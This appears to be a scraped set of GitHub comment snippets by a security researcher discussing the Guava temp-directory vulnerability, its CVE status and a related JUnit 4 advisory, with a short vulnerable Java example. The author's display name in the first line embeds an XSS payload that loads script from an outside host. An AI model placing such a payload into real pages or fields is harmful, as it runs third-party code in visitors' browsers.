Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
I'm no longer working for the company that was actually using this library (just moved from working for HPE to working for Gradle). As such, this is no longer the...
@cy6erGn0m (The start of a potentially bad thought) Is there any good way to detect a development vs production environment and enable this? Or perhaps auto enable when TLS is...
@cy6erGn0m Can you add a disclaimer to the documentation with a big warning telling users to enable this feature before shipping to production?
Can someone from Google make an official statement on whether or not this issue will receive a CVE number or not?
@melloware, this is indeed a security vulnerability, however, given that the severity of this vulnerability is quite low, I think that the way that Google and the Guava team has...
A few options for you. 1. Push back on Sonatype's analysis of this vulnerability. As a customer, if you think that your security vendor's analysis of a given vulnerability is...
> It won't help much we have over 50 in production applications using it so we would have to add this test to each one and all future applications.

Agreed....
@semmalimayan here's the method you're asking about. https://github.com/google/guava/blob/fec0dbc4634006a6162cfd4d0d09c962073ddf40/guava/src/com/google/common/io/Files.java#L470-L487
The true answer here is "it depends". For example, this would be vulnerable:
```java
File tempDirChild = new File(System.getProperty("java.io.tmpdir"), "/child/text_file.txt");
com.google.common.io.Files.createParentDirs(tempDirChild); //...
```
A similar vulnerability has been disclosed and patched in JUnit 4. CVE pending. https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp
To reiterate my earlier question:
> Can someone from Google make an official statement on whether...
After spending some time talking with some others in the security community, defaulting to having a CVE number assigned is preferred. It will help keep the ecosystem sane by providing...